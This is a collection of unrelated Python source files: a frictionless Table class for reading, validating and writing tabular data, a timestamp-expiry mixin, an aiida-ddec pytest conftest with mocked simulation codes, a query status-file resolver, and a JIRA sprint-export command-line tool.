FrictionlessException: any exception that occurs
"""
self.close()
if self.__file.query.metadata_errors:
error = self.__file.query.metadata_errors[0]
raise exceptions.FrictionlessException(error)
try:
self.__file.stats = {"hash": "", "bytes": 0, "rows": 0}
self.__parser = system.create_parser(self.__file)
self.__parser.open()
self.__data_stream = self.__read_data_stream()
self.__row_stream = self.__read_row_stream()
self.__row_number = 0
self.__row_position = 0
return self
except exceptions.FrictionlessException as exception:
self.close()
# Ensure not found file is a scheme error
if exception.error.code == "format-error":
loader = system.create_loader(self.__file)
loader.open()
loader.close()
raise
except Exception:
self.close()
raise
def close(self):
"""Close the table as "filelike.close" does"""
if self.__parser:
self.__parser.close()
self.__parser = None
@property
def closed(self):
"""Whether the table is closed
Returns:
bool: if closed
"""
return self.__parser is None
# Read
def read_data(self):
"""Read data stream into memory
Returns:
any[][]: table data
"""
self.__read_data_stream_raise_closed()
return list(self.__data_stream)
def __read_data_stream(self):
self.__read_data_stream_infer()
return self.__read_data_stream_create()
def __read_data_stream_create(self):
stats = self.__file.stats
limit = self.__file.query.limit_rows
offset = self.__file.query.offset_rows or 0
sample_iterator = self.__read_data_stream_create_sample_iterator()
parser_iterator = self.__read_data_stream_create_parser_iterator()
for row_position, cells in chain(sample_iterator, parser_iterator):
self.__row_position = row_position
if offset:
offset -= 1
continue
self.__row_number += 1
stats["rows"] = self.__row_number
yield cells
if limit and limit <= stats["rows"]:
break
def __read_data_stream_create_sample_iterator(self):
return zip(self.__sample_positions, self.__sample)
def __read_data_stream_create_parser_iterator(self):
start = max(self.__sample_positions or [0]) + 1
iterator = enumerate(self.__parser.data_stream, start=start)
for row_position, cells in iterator:
if self.__read_data_stream_pick_skip_row(row_position, cells):
cells = self.__read_data_stream_filter_data(cells, self.__field_positions)
yield row_position, cells
def __read_data_stream_infer(self):
# Create state
sample = []
header = []
field_positions = []
sample_positions = []
schema = Schema(self.__init_schema)
# Prepare header
buffer = []
widths = []
for row_position, cells in enumerate(self.__parser.data_stream, start=1):
buffer.append(cells)
if self.__read_data_stream_pick_skip_row(row_position, cells):
widths.append(len(cells))
if len(widths) >= self.__infer_volume:
break
# Infer header
row_number = 0
dialect = self.__file.dialect
if dialect.get("header") is None and dialect.get("headerRows") is None and widths:
dialect["header"] = False
width = round(sum(widths) / len(widths))
drift = max(round(width * 0.1), 1)
match = list(range(width - drift, width + drift + 1))
for row_position, cells in enumerate(buffer, start=1):
if self.__read_data_stream_pick_skip_row(row_position, cells):
row_number += 1
if len(cells) not in match:
continue
if not helpers.is_only_strings(cells):
continue
del dialect["header"]
if row_number != config.DEFAULT_HEADER_ROWS[0]:
dialect["headerRows"] = [row_number]
break
# Infer table
row_number = 0
header_data = []
header_ready = False
header_numbers = dialect.header_rows or config.DEFAULT_HEADER_ROWS
iterator = chain(buffer, self.__parser.data_stream)
for row_position, cells in enumerate(iterator, start=1):
if self.__read_data_stream_pick_skip_row(row_position, cells):
row_number += 1
# Header
if not header_ready:
if row_number in header_numbers:
header_data.append(helpers.stringify_header(cells))
if row_number >= max(header_numbers):
infer = self.__read_data_stream_infer_header
header, field_positions = infer(header_data)
header_ready = True
if not header_ready or dialect.header:
continue
# Sample
sample.append(self.__read_data_stream_filter_data(cells, field_positions))
sample_positions.append(row_position)
if len(sample) >= self.__infer_volume:
break
# Infer schema
if not schema.fields:
schema.infer(
sample,
type=self.__infer_type,
names=self.__infer_names or header,
confidence=self.__infer_confidence,
missing_values=self.__infer_missing_values,
)
# Sync schema
if self.__sync_schema:
fields = []
mapping = {field.get("name"): field for field in schema.fields}
for name in header:
fields.append(mapping.get(name, {"name": name, "type": "any"}))
schema.fields = fields
# Patch schema
if self.__patch_schema:
patch_schema = deepcopy(self.__patch_schema)
fields = patch_schema.pop("fields", {})
schema.update(patch_schema)
for field in schema.fields:
field.update((fields.get(field.get("name"), {})))
# Confirm schema
if len(schema.field_names) != len(set(schema.field_names)):
note = "Schemas with duplicate field names are not supported"
raise exceptions.FrictionlessException(errors.SchemaError(note=note))
# Store state
self.__sample = sample
self.__schema = schema
self.__field_positions = field_positions
self.__sample_positions = sample_positions
self.__header = Header(header, schema=schema, field_positions=field_positions)
def __read_data_stream_infer_header(self, header_data):
dialect = self.__file.dialect
# No header
if not dialect.header:
return [], list(range(1, len(header_data[0]) + 1))
# Get header
header = []
prev_cells = {}
for cells in header_data:
for index, cell in enumerate(cells):
if prev_cells.get(index) == cell:
continue
prev_cells[index] = cell
if len(header) <= index:
header.append(cell)
continue
header[index] = dialect.header_join.join([header[index], cell])
# Filter header
filter_header = []
field_positions = []
limit = self.__file.query.limit_fields
offset = self.__file.query.offset_fields or 0
for field_position, header in enumerate(header, start=1):
if self.__read_data_stream_pick_skip_field(field_position, header):
if offset:
offset -= 1
continue
filter_header.append(header)
field_positions.append(field_position)
if limit and limit <= len(filter_header):
break
return filter_header, field_positions
def __read_data_stream_pick_skip_field(self, field_position, header):
match = True
for name in ["pick", "skip"]:
if name == "pick":
items = self.__file.query.pick_fields_compiled
else:
items = self.__file.query.skip_fields_compiled
if not items:
continue
match = match and name == "skip"
for item in items:
if item == "<blank>" and header == "":
match = not match
elif isinstance(item, str) and item == header:
match = not match
elif isinstance(item, int) and item == field_position:
match = not match
elif isinstance(item, typing.Pattern) and item.match(header):
match = not match
return match
def __read_data_stream_pick_skip_row(self, row_position, cells):
match = True
cell = cells[0] if cells else None
cell = "" if cell is None else str(cell)
for name in ["pick", "skip"]:
if name == "pick":
items = self.__file.query.pick_rows_compiled
else:
items = self.__file.query.skip_rows_compiled
if not items:
continue
match = match and name == "skip"
for item in items:
if item == "<blank>":
if not any(cell for cell in cells if cell not in ["", None]):
match = not match
elif isinstance(item, str):
if item == cell or (item and cell.startswith(item)):
match = not match
elif isinstance(item, int) and item == row_position:
match = not match
elif isinstance(item, typing.Pattern) and item.match(cell):
match = not match
return match
def __read_data_stream_filter_data(self, cells, field_positions):
if self.__file.query.is_field_filtering:
result = []
for field_position, cell in enumerate(cells, start=1):
if field_position in field_positions:
result.append(cell)
return result
return cells
def __read_data_stream_raise_closed(self):
if not self.__data_stream:
note = 'the table has not been opened by "table.open()"'
raise exceptions.FrictionlessException(errors.Error(note=note))
def read_rows(self):
"""Read row stream into memory
Returns:
Row[]: table rows
"""
self.__read_row_stream_raise_closed()
return list(self.__row_stream)
def __read_row_stream(self):
return self.__read_row_stream_create()
def __read_row_stream_create(self):
schema = self.schema
# Create state
memory_unique = {}
memory_primary = {}
foreign_groups = []
for field in self.schema.fields:
if field.constraints.get("unique"):
memory_unique[field.name] = {}
if self.__lookup:
for fk in self.schema.foreign_keys:
group = {}
group["sourceName"] = fk["reference"]["resource"]
group["sourceKey"] = tuple(fk["reference"]["fields"])
group["targetKey"] = tuple(fk["fields"])
foreign_groups.append(group)
# Stream rows
for cells in self.__data_stream:
# Create row
row = Row(
cells,
schema=self.__schema,
field_positions=self.__field_positions,
row_position=self.__row_position,
row_number=self.__file.stats["rows"],
)
# Unique Error
if memory_unique:
for field_name in memory_unique.keys():
cell = row[field_name]
if cell is not None:
match = memory_unique[field_name].get(cell)
memory_unique[field_name][cell] = row.row_position
if match:
Error = errors.UniqueError
note = "the same as in the row at position %s" % match
error = Error.from_row(row, note=note, field_name=field_name)
row.errors.append(error)
# Primary Key Error
if schema.primary_key:
cells = tuple(row[field_name] for field_name in schema.primary_key)
if set(cells) == {None}:
note = 'cells composing the primary keys are all "None"'
error = errors.PrimaryKeyError.from_row(row, note=note)
row.errors.append(error)
else:
match = memory_primary.get(cells)
memory_primary[cells] = row.row_position
if match:
note = "the same as in the row at position %s" % match
error = errors.PrimaryKeyError.from_row(row, note=note)
row.errors.append(error)
# Foreign Key Error
if foreign_groups:
for group in foreign_groups:
group_lookup = self.__lookup.get(group["sourceName"])
if group_lookup:
cells = tuple(row[name] for name in group["targetKey"])
if set(cells) == {None}:
continue
match = cells in group_lookup.get(group["sourceKey"], set())
if not match:
note = "not found in the lookup table"
error = errors.ForeignKeyError.from_row(row, note=note)
row.errors.append(error)
# Stream row
yield row
def __read_row_stream_raise_closed(self):
if not self.__row_stream:
note = 'the table has not been opened by "table.open()"'
raise exceptions.FrictionlessException(errors.Error(note=note))
# Write
# NOTE: implement proper usage of loaders (e.g. write to s3)
# NOTE: allow None target and return result for inline/pandas/etc?
def write(
self,
target,
*,
scheme=None,
format=None,
hashing=None,
encoding=None,
compression=None,
compression_path=None,
control=None,
dialect=None,
):
"""Write the table to the target
Parameters:
target (str): target path
**options: subset of Table's constructor options
"""
# Create file
file = File(
source=target,
scheme=scheme,
format=format,
hashing=hashing,
encoding=encoding,
compression=compression,
compression_path=compression_path,
control=control,
dialect=dialect,
)
# Write file
row_stream = self.__write_row_stream_create()
parser = system.create_parser(file)
parser.write(row_stream)
def __write_row_stream_create(self):
self.__read_data_stream_raise_closed()
yield from self.row_stream
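# Hedged usage sketch (not part of the original module): a minimal read/write
# flow for the Table defined above, assuming the public frictionless API
# (Table as a context manager, `read_rows()`, `write()`). The file names
# "capital.csv" and "capital-copy.csv" are hypothetical examples.
if __name__ == "__main__":
    with Table("capital.csv") as table:
        print(table.header)                         # inferred or dialect-provided header
        print(len(table.read_rows()), "rows read")  # materialize the row stream
    # Writing re-streams the rows, so open a fresh table for the conversion.
    with Table("capital.csv") as table:
        table.write("capital-copy.csv")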
|
import datetime
from abc import ABCMeta
class IExpirable(metaclass=ABCMeta):
def __init__(self):
self.time_stamp = None
self.retrieved_time_stamp = None
def set_retrieved_time_stamp(self, time_stamp):
self.retrieved_time_stamp = time_stamp
def set_time_stamp(self, time_stamp):
self.time_stamp = datetime.datetime.strptime(time_stamp, '%Y-%m-%dT%H:%M:%S.%f')
def is_expired(self, expire_minutes, use_retrieved_time_stamp=False):
utc_now = datetime.datetime.utcnow()
time_stamp_to_compare = self.retrieved_time_stamp if use_retrieved_time_stamp else self.time_stamp
if time_stamp_to_compare is None:
return True
return time_stamp_to_compare + datetime.timedelta(minutes=expire_minutes) < utc_now
def is_most_recent(self, other_expirable, use_retrieved_time_stamp=False):
if other_expirable is None:
return True
other_time_stamp_to_compare = other_expirable.retrieved_time_stamp if use_retrieved_time_stamp else other_expirable.time_stamp
if other_time_stamp_to_compare is None:
return True
time_stamp_to_compare = self.retrieved_time_stamp if use_retrieved_time_stamp else self.time_stamp
if time_stamp_to_compare is None:
return False
return time_stamp_to_compare > other_time_stamp_to_compare
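# Hedged usage sketch (not part of the original module): `CachedRecord` is a
# hypothetical concrete subclass illustrating how the expiry helpers above are
# meant to be used.
class CachedRecord(IExpirable):
    """Minimal expirable record relying only on the inherited timestamps."""

if __name__ == '__main__':
    record = CachedRecord()
    record.set_time_stamp('2024-01-01T12:00:00.000000')
    # A record without any timestamp is always treated as expired.
    print(CachedRecord().is_expired(expire_minutes=30))  # True
    # A record stamped far in the past has long exceeded a 30-minute window.
    print(record.is_expired(expire_minutes=30))          # True
    # Any timestamp counts as more recent than a missing comparison object.
    print(record.is_most_recent(None))                   # True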
|
# -*- coding: utf-8 -*-
"""
For pytest
initialise a test database and profile
"""
import os
import pytest
from aiida_ddec.calculations import DENSITY_DIR_EXTRA, DENSITY_DIR_SYMLINK
from tests import DATA_DIR
from examples import DATA_DIR as EXAMPLES_DATA_DIR
pytest_plugins = ['aiida.manage.tests.pytest_fixtures', 'aiida_testing.mock_code'] # pylint: disable=invalid-name
@pytest.fixture(scope='function', autouse=True)
def clear_database_auto(clear_database): # pylint: disable=unused-argument
"""Automatically clear database in between tests."""
@pytest.fixture(scope='function')
def cp2k_code(mock_code_factory):
"""Create mocked "cp2k" code."""
return mock_code_factory(
label='cp2k-7.1',
data_dir_abspath=DATA_DIR,
entry_point='cp2k',
# files *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', 'BASIS_MOLOPT', 'GTH_POTENTIALS', 'dftd3.dat', '*.bak*'))
@pytest.fixture(scope='function')
def raspa_code(mock_code_factory):
"""Create mocked "raspa" code."""
return mock_code_factory(
label='raspa-e968334',
data_dir_abspath=DATA_DIR,
entry_point='raspa',
# paths *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', 'CrashRestart/*', 'Movies/*', 'VTK/*', 'RestartInitial/*'))
@pytest.fixture(scope='function')
def zeopp_code(mock_code_factory):
"""Create mocked "zeo++" code."""
return mock_code_factory(
label='zeopp-0.3',
data_dir_abspath=DATA_DIR,
entry_point='zeopp.network',
# files *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', 'UFF.rad'))
@pytest.fixture(scope='function')
def ddec_code(mock_code_factory):
"""Create mocked "ddec" code."""
code = mock_code_factory(
label='chargemol-09_26_2017',
data_dir_abspath=DATA_DIR,
entry_point='ddec',
# files *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', '*.cube', DENSITY_DIR_SYMLINK))
# Set atomic density directory extra on code
density_dir = os.environ.get(DENSITY_DIR_EXTRA)
if not density_dir:
density_dir = EXAMPLES_DATA_DIR / 'ddec' / 'atomic_densities'
code.set_extra(DENSITY_DIR_EXTRA, str(density_dir))
return code
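# Hedged usage sketch (not part of the original conftest): a minimal test that
# requests one of the mocked code fixtures defined above. Only the presence of
# the injected code node is asserted; anything stronger would depend on the
# aiida-testing mock-code plugin internals.
def test_cp2k_code_fixture(cp2k_code):
    """The fixture should provide a usable mocked "cp2k" code node."""
    assert cp2k_code is not None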
|
import ast
import os
from lcc.entities.exceptions import InvalidFilesPath
import numpy as np
from lcc.utils.helpers import sub_dict_in_dict
from lcc.utils.helpers import check_depth
class StatusResolver(object):
'''
This class handles status files generated through systematic database
searches and reads files of planned queries.
Attributes
----------
status_header : list
Column names of status file
status_queries : list
Rows of status file
'''
NUM_STATUS_INFO = 4 # Number of status info columns +1
DELIMITER = ";"
def __init__(self, status_file_path):
'''
Parameters
----------
status_file_path : str
Path to the status file
FORMAT OF STATUS FILE:
#first_query_param second_query_param other_query_param found filtered passed
value1 value2 other_value True/False True/False True/False
...
This file is generated automatically during systematic search.
'''
self.status_header, self.status_queries = self._readFile(
status_file_path)
def getUnsearchedQuery(self, search_plan_file):
'''
Return a list of queries which have not been run yet.
Parameters
----------
search_plan_file : str
Path to the file of planned queries
Returns
-------
list
List of query dictionaries
Note
----
The format of the plan-queries file is the same as the status file,
except that the last three columns (found, filtered and passed) are omitted.
'''
plan_header, plan_queries = self._readFile(search_plan_file)
header_restr = self.status_header[:-self.NUM_STATUS_INFO]
col_num = len(header_restr)
queries_restr = np.hsplit(self.status_queries, np.array([col_num]))[0]
status_dict = self._getDictQuery(header_restr, queries_restr)
plan_dict = self._getDictQuery(plan_header, plan_queries)
return self._getDiff(plan_dict, status_dict)
def getWithStatus(self, stat):
'''
Get queries with given query status
Parameters
----------
stat : dict
Dictionary with status column name and its value
Example
--------
getStatus({"passed" : True}) --> [{"field":1,"starid":1, "target":"lmc"}, .. , {...}]
This example generates all stars which passed thru filtering
Returns
-------
list
Returns all queries with desired status
'''
status_dict = self._getDictQuery(
self.status_header, self.status_queries)
return sub_dict_in_dict(stat, status_dict, ["passed", "filtered", "found"])
def getQueries(self):
'''
Get status file as list of queries
Returns
-------
list
List of dictionary queries
'''
return self._getDictQuery(self.status_header, self.status_queries)
@classmethod
def save_query(self, query, fi_name="query_file.txt", PATH=".", DELIM=None,
overwrite=False):
'''
Save queries into a file which can be loaded for another run
Parameters
----------
query : list
List of dictionaries which contain query params
fi_name : str
Name of the output file
PATH : str
Directory where the file is written
DELIM : str
Column delimiter (defaults to the class DELIMITER)
overwrite : bool
Overwrite the file instead of appending to it
Returns
-------
None
'''
header = list(query[0].keys())
path = os.path.join(PATH, fi_name)
if not DELIM:
DELIM = self.DELIMITER
try:
if overwrite:
query_file = open(path, "w+")
else:
query_file = open(path, "a+")
except IOError as err:
raise InvalidFilesPath(err)
n = len(header)
if not query_file.readline().startswith("#"):
query_file.write("#")
for i, head in enumerate(header):
delim = DELIM
if i >= n - 1:
delim = ""
query_file.write(head + delim)
query_file.write("\n")
for que in query:
if len(que) != len(header):
raise Exception(
"Number of header params and values have to be the same.\nGot query %s and header %s \nCheck the query file if there are no missing value in any column or if there is a whitespace." % (que, header))
for i, key in enumerate(que):
delim = DELIM
if i >= n - 1:
delim = ""
query_file.write(str(que[key]) + delim)
query_file.write("\n")
query_file.close()
@classmethod
def save_lists_query(self, query=[], fi_name="query_file.txt", PATH=".", DELIM=None,
overwrite=False, header=None):
'''
Save queries into a file which can be loaded for another run
Parameters
----------
query : list
List of lists which contain query values
Returns
-------
None
'''
path = os.path.join(PATH, fi_name)
if not DELIM:
DELIM = self.DELIMITER
if not check_depth(query, 2, ifnotraise=False):
query = [query]
if not header and query[0]:
return False
try:
if overwrite:
query_file = open(path, "w+")
else:
query_file = open(path, "a+")
except IOError as err:
raise InvalidFilesPath(err)
query_file.seek(0)
if header and not query_file.readline():
query_file.write(
"#" + DELIM.join([str(it) for it in header]) + "\n")
for line in query:
query_file.write(DELIM.join([str(it) for it in line]) + "\n")
query_file.close()
@staticmethod
def get_with_status(queries, stat={"passed": True}):
'''
Return all queries with desired status
Parameters
----------
stat : dict
Dictionary with status column name and its value
queries : list
List of query dictionaries
Returns
-------
list
Returns all queries with desired status
'''
return sub_dict_in_dict(stat, queries)
def _readFile(self, path):
'''Get header and data from the file'''
header = self._readHeader(path)
data = self._getFileData(path)
# data = np.genfromtxt(path,dtype="|S5", delimiter = self.DELIMITER)
# data = self._correctData(data, header)
if len(header) != len(data[0]):
raise Exception(
"Number of header params and values have to be the same.\nGot %s and %s" % (data[0], header))
return header, data
def _readHeader(self, status_file_path):
'''Get keys from header in a list'''
with open(status_file_path, 'r') as f:
# Skip first symbol ('#') and the '\n'
header_line = f.readline()[1:].rstrip('\n')
return [head.strip() for head in header_line.split(self.DELIMITER)]
def _getDiff(self, desir_dicts, comp_dicts):
'''Get dictionaries from desir_dicts which are not present in comp_dicts'''
diff_dicts = []
for query in desir_dicts:
if query not in comp_dicts:
diff_dicts.append(query)
return diff_dicts
def _getDictQuery(self, header, queries):
'''Get header list and contents of the status file as list of dictionaries'''
queries_list = []
for query in queries:
if not isinstance(query, (np.ndarray, list)):
query = [query]
queries_list.append(dict(list(zip(header, query))))
return queries_list
def _readInStr(self, words):
ENUM_SEP = ","
x = []
for word in words:
if ENUM_SEP in str(word):
x.append(word.split(ENUM_SEP))
else:
try:
x.append(ast.literal_eval(word.strip()))
except (ValueError, SyntaxError):
x.append(word)
return x
def _correctData(self, data, header):
try:
len(data[0])
assert not isinstance(data[0], str)
except (TypeError, IndexError, AssertionError):
# Check if just one value
try:
len(data)
except TypeError:
return [[data]]
# One line
if len(data) == len(header):
return [data]
# One column
else:
return [[i] for i in data]
return data
def _getFileData(self, path):
fi = open(path)
data = []
for line in fi.readlines():
line = line.strip()
if not line.startswith("#"):
parts = line.split(self.DELIMITER)
parts = self._readInStr(parts)
data.append(parts)
fi.close()
return data
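# Hedged usage sketch (not part of the original module): write a small plan
# file with `save_query` and load it back through `StatusResolver`. The file
# name and the query values are made up for illustration only.
if __name__ == "__main__":
    plan = [
        {"field": 1, "starid": 1, "target": "lmc"},
        {"field": 2, "starid": 7, "target": "smc"},
    ]
    StatusResolver.save_query(plan, fi_name="plan_queries.txt", overwrite=True)
    # A real status file additionally carries the found/filtered/passed columns;
    # here we only read the saved plan back as a list of query dictionaries.
    resolver = StatusResolver("plan_queries.txt")
    print(resolver.getQueries())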
|
import getpass
import pickle
import sys
from domain import exceptions
from domain.config import Config, CredentialsConfig
from domain.sprint import Sprint
from export.exporter_factory import create_exporter
from communication.jira_agent import JiraAgent
from shell.argument_parser import ArgumentParser
from shell.config_manager import ConfigManager
def run():
try:
argument_parser = ArgumentParser(sys.argv)
if not argument_parser.parse():
return
config = load_configuration(argument_parser.config_file_path)
sprint = load_data(argument_parser, config)
if argument_parser.raw_data_target:
save_data(sprint, argument_parser.raw_data_target)
print('Exporting data...')
export_result(
sprint,
argument_parser.output_file_path,
config.export,
argument_parser.export_format)
print('Data exported successfully.')
except exceptions.ArgumentParserException as exception:
print(str(exception))
argument_parser.print_help()
sys.exit(1)
except exceptions.ConfigManagerException as exception:
print(str(exception))
sys.exit(2)
except exceptions.InvalidConfigException as exception:
print(F'Configuration is invalid. {exception}')
sys.exit(2)
def load_configuration(config_file_path):
config_manager = ConfigManager(config_file_path)
return config_manager.load()
def load_data(argument_parser, config):
if argument_parser.raw_data_source:
return load_data_from_file(argument_parser.raw_data_source)
return download_data(config, argument_parser.jira_board_id, argument_parser.jira_sprint_name)
def load_data_from_file(file_path):
print('Loading data from file...')
with open(file_path, 'rb') as pkl_file:
return pickle.load(pkl_file)
def download_data(config, jira_board_id, jira_sprint_name):
config = verify_credentials(config)
print('Connecting to JIRA...')
agent = connect_to_jira(config)
print('Retrieving sprint ID...')
sprint_id = retrieve_sprint_id(agent, jira_board_id, jira_sprint_name)
print('Retrieving sprint info...')
sprint_info = agent.retrieve_sprint_info(sprint_id)
print('Downloading issues and work logs...')
return Sprint(sprint_info, agent.download_work_log_of_sprint(sprint_id))
def save_data(sprint, file_path):
print(F'Saving raw data to {file_path}...')
with open(file_path, 'wb') as output:
pickle.dump(sprint, output)
def verify_credentials(config):
username = config.credentials.username
password = config.credentials.password
if username and password:
return config
(username, password) = ask_for_credentials(username, password)
credentials_config = CredentialsConfig(username, password)
config = Config(config.general, credentials_config, config.export)
return config
def ask_for_credentials(username, password):
if not username:
username = input('Username: ')
password = getpass.getpass()
elif not password:
password = getpass.getpass()
return username, password
def connect_to_jira(config):
agent = JiraAgent(config.general.server_url, config.credentials.username, config.credentials.password)
agent.connect()
return agent
def retrieve_sprint_id(agent, board_id, sprint_name):
sprint_id = agent.retrieve_sprint_id(board_id, sprint_name)
if sprint_id == '':
raise Exception(F'Cannot find JIRA sprint with name "{sprint_name}".')
return sprint_id
def export_result(sprint_data, output_path, export_config, export_format):
exporter = create_exporter(export_format, export_config)
exporter.export(output_path, sprint_data)
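# Hedged entry point (not part of the original script): run the exporter when
# the module is executed directly. The command-line flags are defined by the
# project's ArgumentParser and are not assumed here.
if __name__ == '__main__':
    run()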
|